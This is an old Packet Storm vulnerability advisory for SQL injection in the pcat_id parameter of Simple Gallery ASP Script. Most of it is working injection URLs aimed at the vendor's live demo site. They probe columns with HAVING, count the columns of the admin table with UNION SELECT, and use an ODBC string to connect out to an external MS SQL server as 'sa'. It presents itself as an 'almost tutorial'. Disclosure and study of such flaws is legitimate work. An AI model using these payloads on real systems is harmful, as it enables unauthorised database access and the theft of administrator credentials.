simpgal-sql.txt

2008-08-27T00:00:00
ID PACKETSTORM:69431
Type packetstorm
Reporter e.wiZz!
Modified 2008-08-27T00:00:00

Description

                                        
                                            `#################Simple gallery (pcat_id) SQL Injection Vulnerability#########################  
  
  
#######By: e.wiZz! ew1zz@hotmail.com  
#####Info: Bosnian Idiot FTW!  
#####Site: infected.blogger.ba  
#####Greetz: Luigi Auriemma,str0ke   
  
In the wild....  
######################################################################################  
  
#####Project Name: Simple Gallery ASP Script  
#####Site: preprojects.com  
#####Vulnerability: SQL Injection  
  
#####PoC on demo site :  
http://www.preprojects.com/pgallery/gallery/  
  
Ok,we have table "admin",but we need to find how many columns is there,to extract somethin' ....but we need to know at least one column to start....lets find one :)  
  
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 HAVING sum('inthewild')='inthewild'  
  
we got photo_id ....lets find how many columns is there:  
  
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id from admin  
  
we got error: The number of columns in the two selected tables or queries of a union query do not match. Try something else...  
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id,null,null,null,null,null,null,null,null from admin  
  
response: No value given for one or more required parameters. ......so its 9 columns...i wont continue with it.  
  
  
  
Connect to a network accessible MS SQL instance (heavy injection :)   
  
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 UNION SELECT *  
FROM [ODBC;DRIVER=SQL SERVER;Server=<serverinthewild>,<Port>;UID=sa;PWD=<PASSWORD>;  
DATABASE=master].Information_Schema.Tables where '1'='1'or'bosnian'='idiot'  
  
  
Almost tutorial :)`